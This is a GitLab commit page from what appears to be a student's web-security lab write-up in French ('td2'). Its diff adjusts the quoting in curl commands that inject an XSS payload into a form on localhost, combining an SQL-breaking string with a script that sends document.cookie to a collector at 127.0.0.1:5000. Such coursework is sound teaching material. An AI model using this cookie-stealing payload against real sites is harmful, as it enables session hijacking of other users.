Skip to content
Snippets Groups Projects
Commit b9ca2eb8 authored by Hugo Monfleur's avatar Hugo Monfleur
Browse files

Fin td2 (légère modification).

parent e27df917
Branches master
No related tags found
No related merge requests found
......@@ -38,7 +38,7 @@ La faille peut être corrigée en préparant la requête. Ainsi il n'est plus po
curl 'http://localhost:8080/' -X POST --data-raw "chaine=<script>alert(\"Hello\!\")</script>','I am the devil')#&submit=OK"
* Commande curl pour lire les cookies
curl 'http://localhost:8080/' -X POST --data-raw "chaine=<script type="text/javascript">location.replace("http://127.0.0.1:5000?c="%2Bdocument.cookie)%3B</script>','I am the devil')#&submit=OK"
curl 'http://localhost:8080/' -X POST --data-raw "chaine=<script type="text/javascript">location.replace(\"http://127.0.0.1:5000?c=\"%2Bdocument.cookie)%3B</script>','I am the devil')#&submit=OK"
## Question 6
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment